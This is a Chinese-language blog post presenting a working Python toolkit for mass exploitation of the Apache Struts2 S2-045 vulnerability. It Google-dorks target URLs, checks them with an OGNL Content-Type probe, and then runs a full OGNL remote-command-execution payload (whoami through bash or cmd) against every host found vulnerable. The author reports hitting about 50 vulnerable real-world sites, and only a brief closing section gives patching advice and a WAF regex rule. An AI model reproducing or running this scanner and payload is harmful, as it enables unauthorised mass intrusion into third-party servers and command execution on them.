前言
S2-045远程代码执行漏洞的CNVD详细信息:http://www.cnvd.org.cn/flaw/show/CNVD-2017-02474漏洞刚出现时候,Google随便搜索相关URL(filetype:action||ext:action),利用后发现有很多甚者使用ROOT用户启动Tomcat,啧啧啧。。。
目前,很多公司已经紧锣旗鼓地修复了漏洞,尽管如此,互联网上还是有大批未修复的目标。。。可能感觉无所谓吧
批量S2-045用python 2.7实现,代码共分三部分,比较糙,多指正。
第一部分:从Google批量抓取目标URL;
第二部分:验证筛选存在漏洞的URL;
第三部分:远程命令执行
一、Google抓取URL
目标URL抓取,可能会被Google限制抓取次数,若有IP资源,可以不断更换代理、多线程抓取。
—keywords文件—–>抓取关键词,例如:filetype:action、ext:action
—urser-agent文件—–>随机ua抓取
—urlresult文件—–>存储抓取的url
#!/usr/bin/python # -*- coding: utf-8 -*- # Create by Meibenjin. # Modified by William # Last updated: 2017-03-10 # google search results crawler import sys import urllib2, socket, time import gzip, StringIO import re, random, types from bs4 import BeautifulSoup base_url = 'https://www.google.com.hk/' results_per_page = 10 user_agents = list() # results from the search engine class SearchResult: def __init__(self): self.url = '' def getURL(self): return self.url def setURL(self, url): self.url = url def printIt(self, prefix=''): print 'url\t->', self.url def writeFile(self, filename): file = open(filename, 'a') try: file.write(self.url + '\n') except IOError, e: print 'file error:', e finally: file.close() class GoogleAPI: def __init__(self): timeout = 40 socket.setdefaulttimeout(timeout) def randomSleep(self): sleeptime = random.randint(60, 120) time.sleep(sleeptime) # extract a url from a link def extractUrl(self, href): url = '' pattern = re.compile(r'(http[s]?://[^&]+)&', re.U | re.M) url_match = pattern.search(href) if (url_match and url_match.lastindex > 0): url = url_match.group(1) return url # extract serach results list from downloaded html file def extractSearchResults(self, html): results = list() soup = BeautifulSoup(html, "html.parser") div = soup.find('div', id='search') if (type(div) != types.NoneType): #modify 'li' to 'div' lis = div.findAll('div', {'class': 'g'}) if (len(lis) > 0): for li in lis: result = SearchResult() h3 = li.find('h3', {'class': 'r'}) if (type(h3) == types.NoneType): continue # extract url from h3 object link = h3.find('a') if (type(link) == types.NoneType): continue url = link['href'] url = self.extractUrl(url) if (cmp(url, '') == 0): continue result.setURL(url) results.append(result) return results # search web # @param query -> query key words # @param lang -> language of search results # @param num -> number of search results to return def search(self, query, lang='en', num=results_per_page): search_results = list() query = urllib2.quote(query) if (num % results_per_page == 0): pages = num / results_per_page else: pages = num / results_per_page + 1 for p in range(0, pages): start = p * results_per_page url = '%s/search?hl=%s&num=%d&start=%s&q=%s' % (base_url, lang, results_per_page, start, query) retry = 3 while (retry > 0): try: request = urllib2.Request(url) length = len(user_agents) index = random.randint(0, length - 1) user_agent = user_agents[index] request.add_header('User-agent', user_agent) request.add_header('connection', 'keep-alive') request.add_header('Accept-Encoding', 'gzip') request.add_header('referer', base_url) response = urllib2.urlopen(request) html = response.read() if (response.headers.get('content-encoding', None) == 'gzip'): html = gzip.GzipFile(fileobj=StringIO.StringIO(html)).read() results = self.extractSearchResults(html) search_results.extend(results) break; except urllib2.URLError, e: print 'url error:', e self.randomSleep() retry = retry - 1 continue except Exception, e: print 'error:', e retry = retry - 1 self.randomSleep() continue return search_results def load_user_agent(): fp = open('./user_agents', 'r') line = fp.readline().strip('\n') while (line): user_agents.append(line) line = fp.readline().strip('\n') fp.close() def crawler(): # Load use agent string from file load_user_agent() # Create a GoogleAPI instance api = GoogleAPI() # set expect search results to be crawled expect_num = 100 # if no parameters, read query keywords from file if (len(sys.argv) < 2): keywords = open('./keywords', 'r') keyword = keywords.readline() while (keyword): results = api.search(keyword, num=expect_num) for r in results: r.printIt() r.writeFile('urlresult') keyword = keywords.readline() keywords.close() else: keyword = sys.argv[1] results = api.search(keyword, num=expect_num) for r in results: r.printIt() r.writeFile('urlresult') if __name__ == '__main__': crawler() |
二、POC漏洞验证
验证是否有s2-045漏洞
—urlresult文件—–>已存储的抓取的url
—detectreslut文件—–>存储验证成功的url
# -*- coding: utf-8 -*- import urllib2 S2_045 = {"poc": "%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('fuck')).(#o.close())}", "key": "fuck"} def poccheck(timeout): urls = open('../GoogleSearch/urlresult', 'r') detectresults = open('./detectresult', 'w') for url in urls.readlines(): url = url.strip('\n') url = url.split('%3F', 1)[0] request = urllib2.Request(url) request.add_header("Content-Type", S2_045["poc"]) request.add_header("User-Agent", "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:51.0) Gecko/20100101 Firefox/51.0") try: res_html = urllib2.urlopen(request, timeout=timeout).read(204800) except Exception,e: print 'exception:'+url if S2_045['key'] in res_html: print S2_045['key']+':'+url detectresults.write(url+'\n') urls.close() detectresults.close() if __name__ == "__main__": print poccheck(10) |
三、远程命令执行
在已发现的具有漏洞的URL基础上,执行远程命令。
代码中执行whoami,有的已验证漏洞URL,远程命令执行会捕获异常或返回html页面,猜测目标structs2并未修复,只是在应用层的检测和响应做出防御。
—detectreslut文件—–>已存储的验证成功的url
—exploitresult文件—–>存储whoami执行结果
# -*- coding: utf-8 -*- import urllib2 import sys from poster.encode import multipart_encode from poster.streaminghttp import register_openers def exploit(): urls = open('../S2045Detection/detectresult', 'r') exploitresults = open('./exploitresult', 'w') for url in urls.readlines(): url = url.strip('\n') register_openers() datagen, header = multipart_encode({"image1": url}) header["User-Agent"]="Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" header["Content-Type"]="%{(#nikenb='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='"+'whoami'+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" request = urllib2.Request(url,datagen,headers=header) try: response = urllib2.urlopen(request, timeout=10) result = response.read(204800) except Exception, e: print 'exception:'+url else: if len(result) > 100: print 'html:'+url else: print result.strip('\n')+':'+ url exploitresults.write(result) urls.close() exploitresults.close() if __name__ == "__main__": exploit() |
结果:
抓取不到300个URL就被Google返回503状态码,可以考虑付费API、更换代理、多进程进一步改进效率。
小范围统计,约200个目标URL,返回50个具有漏洞的URL。
远程命令执行,部分成功结果如下图所示。
关于防护:
除了升级到要求的struct2框架版本外,可以考虑暂时设置WAF规则拦截攻击行为。
附:Imperva WAF拦截规则
Signature Pattern: part="Content-Type", part="multipart/form-data", part="_memberAccess", rgxp="^Content-Type\s*:[^\x0A\x0D]*multipart\/form-data[^\x0A\x0D]*_memberAccess"
Protocols: http, https
Search Signature In: Headers